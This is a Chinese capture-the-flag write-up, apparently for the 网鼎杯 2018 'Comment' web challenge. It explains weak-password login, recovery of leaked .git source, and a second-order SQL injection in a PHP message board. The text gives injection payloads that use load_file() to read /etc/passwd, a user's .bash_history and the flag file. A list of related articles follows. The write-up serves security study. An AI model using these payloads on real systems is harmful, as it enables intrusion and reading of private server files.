这题目太顶了
进去随便发个贴,出现登录

已经提示用户名和密码了,弱密码登录(得自己去爆破)
zhangwei666即可

没啥思路,扫下目录试试,kali的dirb扫到.git泄露
githacker得到源码
看到这我懵了

看了web,这是一段残缺的代码,需要进行恢复
指令如下

git log --reflog
  • 1

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
  • 1

得到完整源码

<?php

include "mysql.php";

session_start();

if($_SESSION['login'] != 'yes'){

    header("Location: ./login.php");

    die();

}

if(isset($_GET['do'])){

switch ($_GET['do'])

{

case 'write':

    $category = addslashes($_POST['category']);

    $title = addslashes($_POST['title']);

    $content = addslashes($_POST['content']);

    $sql = "insert into board

            set category = '$category',

                title = '$title',

                content = '$content'";

    $result = mysql_query($sql);

    header("Location: ./index.php");

    break;

case 'comment':

    $bo_id = addslashes($_POST['bo_id']);

    $sql = "select category from board where id='$bo_id'";

    $result = mysql_query($sql);

    $num = mysql_num_rows($result);

    if($num>0){

    $category = mysql_fetch_array($result)['category'];

    $content = addslashes($_POST['content']);

    $sql = "insert into comment

            set category = '$category',

                content = '$content',

                bo_id = '$bo_id'";

    $result = mysql_query($sql);

    }

    header("Location: ./comment.php?id=$bo_id");

    break;

default:

    header("Location: ./index.php");

}

}

else{

    header("Location: ./index.php");

}

?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46


可以发现当do=write的时候,传入的信息都会进行转义,但是数据库会自动清除反斜杠,

当do=comment的时候,可以发现直接从category这个字段进行查询,这就导致了二次注入
所以说那个转义函数根本起不到防护的作用

二次注入讲解

通过下面的sql语句来进行注入

首先我们需要在界面看到sql注入后的回显


可以发现content这个变量最后会回显在我们的留言页面中,那么就通过他来输出我们的sql语句
然后闭合sql语句 由于内容太多了,采取/**/的批量注释方法,

payload

title=23&category=1',content=database(),/*&content=3123
  • 1

再让content = */#


提交之后会爆出库名,emmmm我按照常规的注入不知道为啥没有任何回显,.看了wp
查看user

得知使用者是root权限

这样的话,一般 flag 就不会在数据库里面(因为如果在数据库中,不需要root权限)

所以sql注入读取本地文件 可以使用load_file()
玩过linux的都知道 /etc/passwd这里存储用户信息
paylaod

213',content=(select load_file('/etc/passwd')),/*
  • 1


有个www用户
查看bash_history : 保存了当前用户使用过的历史命令,方便查找
在/home/www/下
paylaod

213',content=(select load_file('/home/www/.bash_history')),/*
  • 1


看见他删除了 .DS_Store 文件,由于目标环境是docker,所以 .DS_Store 文件应该在 /tmp/html 中。而 .DS_Store 文件中,经常会有一些不可见的字符,可以使用hex函数对其进行16进制转换,

payload

213 ',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*
  • 1

出来一大窜16进制

放bp解码,flag在flag_8946e1f1ee3e40f.php

payload

213',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
  • 1

解码得到flag

COMMENT SQL二次注入的更多相关文章

  1. [转]sql二次注入

    01 二次注入原理 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入.防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据 ...

  2. 深入浅出带你玩转sqlilabs(五)-布尔/延时盲注与二次注入

    SQL测试-基于布尔,延时盲注 布尔,延时注入常用到的判断语句 regexp regexp '^xiaodi[a-z]' 匹配xiaodi及xiaodi...等 if if(条件,5,0) 条件成立 ...

  3. [网鼎杯 2018]Comment-1|SQL注入|二次注入

    1.打开之后只有一个留言页面,很自然的就想到了二次注入得问题,顺带查看了下源代码信息,并没有什么提示,显示界面如下: 2.那先扫描一下目录,同时随便留言一个测试以下,但是显示需要登录,账户.密码给出了 ...

  4. sql注入时易被忽略的语法技巧以及二次注入

    那些容易被忽略.容易被弄错的地方 sql注入时的技巧 ========================================================================= ...

  5. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.二次注入也是 ...

  6. 【sql注入】简单实现二次注入

    [sql注入]简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 1 ...

  7. Sql 注入详解:宽字节注入+二次注入

    sql注入漏洞 原理:由于开发者在编写操作数据库代码时,直接将外部可控参数拼接到sql 语句中,没有经过任何过滤就直接放入到数据库引擎中执行了. 攻击方式: (1) 权限较大时,直接写入webshel ...

  8. [网鼎杯2018]Unfinish-1|SQL注入|二次注入

    1.进入题目之后只有一个登录界面,检查源代码信息并没有发现有用的信息,尝试万能密码登录也不行,结果如下: 2.进行目录扫描,发现了注册界面:register.php,结果如下: 3.那就访问注册界面, ...

  9. sqli-labs(十一)(二次注入)

    第二十四关: 这关考验的是sql的二次注入. 这关是一个登陆加注册的功能点,登陆的地方没有注入,账号密码都输入输入'",页面只会显示登陆失败. 但注册账号的地方没有做过滤可以注册带有单引符号 ...

随机推荐

  1. EF6 Code First 博客学习记录

    学习一下ef6的用法 这个学习过程时按照微软官网的流程模拟了一下 就按照下面的顺序来写吧 1.连接数据库  自动生成数据库 2.数据库迁移 3.地理位置以及同步/异步处理(空了再补) 4.完全自动迁移 ...

  2. JavaScript变量声明与变量声明提前

    JavaScript变量声明 JavaScript中存储数据的容器称为变量.用关键字和标识符创建新变量的语句,称为变量声明.可以通过关键字var进行变量声明,在ES6中增加了let.const关键字声 ...

  3. win10,安装 vmware 后没有虚拟网卡,导致虚拟机没有 ip

    1.确认关闭windows firewall 服务,最保险的关闭时先把服务改为手动再关闭防止塔自动启动! 2.确认开启Device  Install Service .Device Setup Ser ...

  4. UNP第11章——名字与地址转换

    1.域名系统 程序中只使用主机名和服务名的好处是,如果IP或端口变化,只需要改变映射关系,不需要重新编译程序. 1.1 资源记录 DNS的条目为资源记录,有用的项如下: A IPv4地址 AAAA I ...

  5. mysql数据库新增、修改、删除字段和修改表名

    Mysql 删除,添加或修改表字段 删除 ALTER TABLE testalter_tbl DROP i; 新增 ALTER TABLE testalter_tbl ADD i INT; 指定位置新 ...

  6. linux笔记【简版】

    1.linux简介 kernel 内核 shell 外壳 (类似win上的cmd) sh,Bash:#root,$user csh:#root,%user filesystem 文件管理系统 2.优势 ...

  7. Python pip下载过慢解决方案

    pip是一个python的包安装与管理工具,安装python时候可以选择是否安装,如果安装了pip可以使用命令查看版本 C:\Users\Vincente λ pip -V pip 19.2.3 fr ...

  8. 回溯算法 - n 皇后问题

    (1)问题描述 在 n × n 格的棋盘上放置彼此不受攻击的 n 个皇后.按照国际象棋的规则,皇后可以攻击与之处在同一行或同一列或同一斜线上的棋子.n 后问题等价于在 n × n 的棋盘上放置 n 个 ...

  9. Android10_原理机制系列_Binder机制

    前言 Binder 从java到c++到kernel,涉及的内容很多,很难在一篇文章中说清楚.这篇主要是自我记录,方便后续查询并拆分总结的. 因为涉及的的确非常多,不能面面俱到,所以可能一些地方感觉比 ...

  10. elasticsearch集群安装+安全验证+kibana安装

    准备环境 启动4个centos容器, 并暴露相对应端口 (我的本机ip为172.16.1.236,以下涉及到的地方需要修改为自己的ip) node_name ip http port transpor ...